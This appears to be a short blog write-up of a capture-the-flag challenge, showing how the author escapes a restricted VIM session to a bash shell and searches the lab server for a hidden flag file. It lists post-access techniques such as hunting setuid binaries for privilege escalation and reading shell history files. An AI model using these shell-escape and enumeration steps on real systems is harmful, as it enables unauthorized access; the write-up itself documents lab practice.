We were given the following instructions:
ssh -l luser gordo.smpctf.com -p 2282 Password: smpctf Help find waldo..
Once logged in SSH, we are in a VIM. Again, thanks to defcon trivial 200 we know what to do:
:set shell=/bin/bash :!/bin/bash
Then we have a shell:
bash-3.1$ id uid=1005(luser) gid=103(levels) groups=103(levels)
From here, it's just exploration. We can start by using find:
bash-3.1$ find / -iname '*flag*' 2>/dev/null [...] /usr/lib/.flag [...]
Hmm, what's this?
bash-3.1$ ls -l /usr/lib/.flag drwxr-xr-x 2 root root 4096 Jul 9 12:30 /usr/lib/.flag bash-3.1$ cd /usr/lib/.flag bash-3.1$ ls -al total 64 drwxr-xr-x 2 root root 4096 Jul 9 12:30 . drwxr-xr-x 69 root root 53248 Jul 9 12:30 .. -rw-r--r-- 1 root root 54 Jul 9 16:33 smp bash-3.1$ cat smp Challenge Key: cfc6adcc Flag: HAHAHAHAHAHAHHAHAponiesGot it!
If we hadn't find it this way, in such a situation we could have used:
- recursive grep:
grep -Hirn flag /
- find setuid/setgid binaries for privilege escalation:
find / -local -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l '{}' \; - see files that were last modified on the filesystem:
ls -alRt / |head
- reading ~/.bash_history and other history or log files
- up to your imagination :)
No comments:
Post a Comment